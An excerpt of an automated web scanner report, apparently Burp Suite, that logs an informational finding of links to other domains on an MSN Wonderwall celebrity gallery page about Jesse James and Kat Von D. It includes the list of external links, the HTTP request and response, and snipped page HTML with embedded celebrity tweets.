<img src="http://static.wonderwall.com/photos/Module1x1/30371_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Bethenny">Bethenny</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Bethenny/statuses/31719343947522049">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Lol RT <a href="http://twitter.com/AshNHartz">@AshNHartz</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Are you & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716672863731714">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: I was 3 months in this pic RT <a href="http://twitter.com/Please_Stand_By">@Please_Stand_By</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> This is you recently pregnant? <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716118221561856">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31716032452231168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712954776821760">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Opening for a Huge mega star! I'm beyond excited! RT <a href="http://twitter.com/iutrav">@iutrav</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712647732797440">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Ur a doll! RT <a href="http://twitter.com/JoshGottlieb">@JoshGottlieb</a>: Fun day! Thank you <a href="http://twitter.com/BrielleZolciak">@BrielleZolciak</a>, <a href="http://twitter.com/arianazolciak">@arianazolciak</a> <a href="http://twitter.com/biermann71">@biermann71</a> and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712300427644928">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/AtlantaPlaces">@AtlantaPlaces</a>: Club Life is buzzing again: <a href="http://sch.mp/0jHde">http://sch.mp/0jHde</a> - RT <a href="http://twitter.com/KingLj11">@KingLj11</a> Me and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> @ club Life!! <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31711564050472961">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: On plane wish i could call in!RT <a href="http://twitter.com/lxnewyork">@lxnewyork</a> Getting ready to chat with our favorite sunday morning show <a href="http://twitter.com/lxtvopenho">@lxtvopenho</a>... <a href="http://tl.gd/8g30qb">http://tl.gd/8g30qb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705598416392194">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: So happy. Flying <a href="http://twitter.com/continental">@continental</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705092302315520">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/Banshee_Song">@Banshee_Song</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31690324585742336">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/buddyhead">@buddyhead</a> <a href="http://youtu.be/fX_120DMFDQ">http://youtu.be/fX_120DMFDQ</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31688081048342528">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/ipierce89">@ipierce89</a> Oh no! Yur not DRIVING <a href="http://twitter.com/OMGitsjessielee">@OMGitsjessielee</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31674584327528449">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31672009905672192">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31671556916645888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/44221_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rzrachelzoe">rzrachelzoe</a>: RT <a href="http://twitter.com/prabalgurung">@prabalgurung</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rzrachelzoe/statuses/31667825831579649">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.368. http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery

Issue detail

The page was loaded from a URL containing a query string:

http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery?gt1=28135

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://del.icio.us/post?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
http://digg.com/submit?phase=2title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://microsoft.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx
http://platform.twitter.com/widgets.js
http://reddit.com/submit?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
http://sch.mp/0jHde
http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css
http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css
http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css
http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg
http://static.wonderwall.com/photos/Module1x1/23114_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/24074_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/30371_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4145_Module1x1_634273984962298019.jpg
http://static.wonderwall.com/photos/Module1x1/44221_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4422_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg
http://static.wonderwall.com/photos/Original/45347_Original.jpg
http://tl.gd/8g30qb
http://twitpic.com/3uqhh4
http://twitter.com/Akeel93
http://twitter.com/AshNHartz
http://twitter.com/AtlantaPlaces
http://twitter.com/Banshee_Song
http://twitter.com/Bethenny
http://twitter.com/Bethenny/statuses/31719343947522049
http://twitter.com/BowWow
http://twitter.com/BowWow/statuses/31716032452231168
http://twitter.com/BrandonnStRegis
http://twitter.com/BravoAndy
http://twitter.com/BrielleZolciak
http://twitter.com/DJPaulyD
http://twitter.com/DJPaulyD/statuses/31727445837090816
http://twitter.com/Jillzarin
http://twitter.com/Jillzarin/statuses/31705092302315520
http://twitter.com/Jillzarin/statuses/31705598416392194
http://twitter.com/JoshGottlieb
http://twitter.com/Kimzolciak
http://twitter.com/Kimzolciak/statuses/31711564050472961
http://twitter.com/Kimzolciak/statuses/31712300427644928
http://twitter.com/Kimzolciak/statuses/31712647732797440
http://twitter.com/Kimzolciak/statuses/31712954776821760
http://twitter.com/Kimzolciak/statuses/31716118221561856
http://twitter.com/Kimzolciak/statuses/31716672863731714
http://twitter.com/Kimzolciak/statuses/31726145497989121
http://twitter.com/Kimzolciak/statuses/31729214356979713
http://twitter.com/Kimzolciak/statuses/31729553827172352
http://twitter.com/Kimzolciak/statuses/31734736913170432
http://twitter.com/KingLj11
http://twitter.com/MsBrandi17
http://twitter.com/NickCannon
http://twitter.com/NickCannon/statuses/31746607615574016
http://twitter.com/OMGitsjessielee
http://twitter.com/Please_Stand_By
http://twitter.com/Sn00ki
http://twitter.com/Sn00ki/statuses/31737381589614592
http://twitter.com/TheBatkave
http://twitter.com/alydenisof
http://twitter.com/alydenisof/statuses/31744920150614016
http://twitter.com/arianazolciak
http://twitter.com/biermann71
http://twitter.com/buddyhead
http://twitter.com/continental
http://twitter.com/davenavarro6767
http://twitter.com/davenavarro6767/statuses/31674584327528449
http://twitter.com/davenavarro6767/statuses/31688081048342528
http://twitter.com/davenavarro6767/statuses/31690324585742336
http://twitter.com/freejessejames
http://twitter.com/ipierce89
http://twitter.com/iutrav
http://twitter.com/joshgroban
http://twitter.com/joshgroban/statuses/31671556916645888
http://twitter.com/joshgroban/statuses/31672009905672192
http://twitter.com/kimzolciak
http://twitter.com/lxnewyork
http://twitter.com/lxtvopenho
http://twitter.com/mikelizonn
http://twitter.com/prabalgurung
http://twitter.com/rzrachelzoe
http://twitter.com/rzrachelzoe/statuses/31667825831579649
http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347%26ocid%3Dtwtr-utweet
http://twitter.com/thekatvond
http://twitter.com/wendyhagen
http://twitter.com/yokoono
http://twitter.com/yokoono/statuses/31743517785071616
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=CWWWBQ
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5
http://www.bltwy.com/
http://www.delish.com/
http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3
http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
http://www.myspace.com/Modules/PostTo/Pages/?l=3t=580x600-110115A1_JAMES_J_B-GR_05&u=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
http://youtu.be/fX_120DMFDQ
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js
https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery?gt1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 16:56:30 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 166
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="medium" content="image" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Original/45347_Original.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/45347_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/45347_Original.jpg" alt="By Drew MackieYou know how it's awkward to see couples getting all handsy and kissy in public? Thanks to Jesse James and Kat Von D, this uncomfortable situation has been reproduced on Twitter. Yes, it's e-PDA, with all the gooey, sloppy show-offiness of a shameless couple in heat but delivered to your computers and phones. Click through to follow the exchange, but pace yourself: The out-of-character syrupy sweetness may overwhelm even the hardiest of constitutions.@FreeJesseJames: Done, off to the paint shop in the morning. @TheKatVonD: just so you know, you're impressing the hell outta me...Subtext: Kat Von D is easily impressed, given that going to various auto shop locations is part of Jesse James's daily work. Then again, look who she's dating. Her standards for impressive are clearly low.RELATED: See if Kat's blue dye job is a Hairdo or Hair Don't" /></span>
...[SNIP]...
<P ALIGN="LEFT">You know how it's awkward to see couples getting all handsy and kissy in public? Thanks to <A HREF="http://twitter.com/freejessejames" TARGET="_blank">Jesse James</A> and <A HREF="http://twitter.com/thekatvond" TARGET="_blank">Kat Von D</A>
...[SNIP]...
<b>@<A HREF="http://twitter.com/thekatvond" TARGET="_blank">TheKatVonD:</A>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347%26ocid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=580x600-110115A1_JAMES_J_B-GR_05&u=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Reddit</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/24074_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/NickCannon">NickCannon</a>: <a href="http://twitter.com/TheBatkave">@TheBatkave</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/NickCannon/statuses/31746607615574016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4422_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/alydenisof">alydenisof</a>: <a href="http://twitter.com/wendyhagen">@wendyhagen</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/alydenisof/statuses/31744920150614016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4145_Module1x1_634273984962298019.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/yokoono">yokoono</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/yokoono/statuses/31743517785071616">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23114_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Sn00ki">Sn00ki</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Sn00ki/statuses/31737381589614592">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a></a>: Brand new live at 11:30 after ATL finale with <a href="http://twitter.com/kimzolciak">@kimzolciak</a> and her man Kroy! RT:<a href="http://twitter.com/mikelizonn">@mikelizonn</a>: <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31734736913170432">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/MsBrandi17">@MsBrandi17</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729553827172352">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729214356979713">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
